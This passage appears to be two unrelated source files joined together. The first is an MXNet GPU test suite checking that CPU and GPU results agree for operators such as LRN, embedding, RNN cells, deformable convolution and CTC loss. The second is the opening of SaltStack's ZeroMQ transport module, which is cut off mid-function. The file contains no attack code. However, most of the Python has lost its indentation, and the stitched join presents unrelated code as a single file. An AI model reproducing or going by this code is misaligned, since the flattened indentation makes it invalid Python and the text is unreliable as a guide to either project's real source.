{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_lrn():
sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn')
ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}},
{'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_embedding_with_type():
def test_embedding_helper(data_types, weight_types, low_pad, high_pad):
NVD = [[20, 10, 20], [200, 10, 300]]
for N, V, D in NVD:
sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D)
ctx_list = []
for data_type in data_types:
for weight_type in weight_types:
ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,),
'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}})
arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))}
check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'},
arg_params=arg_params)
data_types = [np.float16, np.float32, np.float64, np.int32]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 5, 5)
data_types = [np.uint8]
weight_types = [np.float16, np.float32, np.float64]
test_embedding_helper(data_types, weight_types, 0, 5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/8288")
@with_seed()
def test_svmoutput_with_type():
sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True)
ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}},
{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
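# Illustrative sketch (not part of the original test suite): for in-range indices,
# mx.sym.take gathers along the first axis like numpy.take with axis=0, which is why the
# consistency test above draws integer indices bounded by data_shape[0].
def _take_semantics_sketch():
    a = np.arange(12).reshape(4, 3)
    idx = np.array([[0, 2], [3, 1]])
    out = np.take(a, idx, axis=0)      # out[i, j] == a[idx[i, j]], shape (2, 2, 3)
    assert out.shape == (2, 2, 3)
    assert (out[1, 0] == a[3]).all()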
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
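    # Convert the randomly initialized parameters from cell1's storage layout to cell2's
    # (e.g. fused to stacked or vice versa), so both modules run with identical weights.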
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='lstm', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(100, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed(1234)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_psroipooling_with_type():
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed(1234)
def test_deformable_convolution_with_type():
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 10, 10),
# 'deformable_conv_offset': (2, 18, 8, 8),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_conv_offset': np.float16}},
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'}, tol=tol)
@with_seed()
def test_deformable_convolution_options():
# 2D convolution
# Pad > 0
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_offset': (2, 18, 7, 7),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list)
# Stride > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 18, 3, 3),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
                                               name='deformable_conv')
    check_consistency(sym, ctx_list)
@with_seed()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_rnn_layer():
check_rnn_layer(gluon.rnn.RNN(100, num_layers=3))
check_rnn_layer(gluon.rnn.RNN(100, activation='tanh', num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3))
check_rnn_layer(gluon.rnn.GRU(100, num_layers=3))
check_rnn_layer(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
check_rnn_layer_w_rand_inputs(gluon.rnn.LSTM(100, num_layers=3, bidirectional=True))
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@unittest.skip("Test fails intermittently. Temporarily disabled until fixed. Tracked at https://github.com/apache/incubator-mxnet/issues/8211")
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_gluon_ctc_consistency():
loss = mx.gluon.loss.CTCLoss()
data = mx.nd.arange(0, 4, repeat=40, ctx=mx.gpu(0)).reshape((2,20,4)).flip(axis=0)
cpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.cpu(0))
gpu_label = mx.nd.array([[2,1,-1,-1],[3,2,2,-1]], ctx=mx.gpu(0))
cpu_data = data.copy().as_in_context(mx.cpu(0))
cpu_data.attach_grad()
with mx.autograd.record():
l_cpu = loss(cpu_data, cpu_label)
l_cpu.backward()
gpu_data = data.copyto(mx.gpu(0))
gpu_data.attach_grad()
with mx.autograd.record():
l_gpu = loss(gpu_data, gpu_label)
l_gpu.backward()
assert_almost_equal(cpu_data.grad.asnumpy(), gpu_data.grad.asnumpy(), atol=1e-3, rtol=1e-3)
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
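    # launch(args, ctx, grid_dims, block_dims) runs the compiled kernel; the extra trailing
    # argument passed for saxpy below sizes its 'extern __shared__' buffer.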
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_global_norm_clip_multi_device():
x1 = mx.nd.ones((3,3), ctx=mx.gpu(0))
x2 = mx.nd.ones((4,4), ctx=mx.cpu(0))
norm = gluon.utils.clip_global_norm([x1, x2], 1.0)
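    # Total norm is sqrt(3*3*1 + 4*4*1) = 5, so with max_norm=1.0 every element is scaled
    # by 1/5, which the assertions below verify.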
assert norm == 5.0
assert_almost_equal(x1.asnumpy(), np.ones((3,3))/5)
assert_almost_equal(x2.asnumpy(), np.ones((4,4))/5)
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@unittest.skip("JIRA issue: https://issues.apache.org/jira/projects/MXNET/issues/MXNET-130")
@with_seed()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_score = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_score = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 20)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
if __name__ == '__main__':
import nose
nose.runmodule()
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import logging
import os
import errno
import hashlib
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
import tornado.ioloop
# Import third party libs
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
if key not in loop_instance_map:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
try:
return loop_instance_map[key]
except KeyError:
# In iterating over the loop_instance_map, we may have triggered
# garbage collection. Therefore, the key is no longer present in
# the map. Re-gen and add to map.
log.debug('Initializing new AsyncZeroMQReqChannel due to GC for {0}'.format(key))
new_obj = object.__new__(cls)
new_obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = new_obj
return loop_instance_map[key]
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
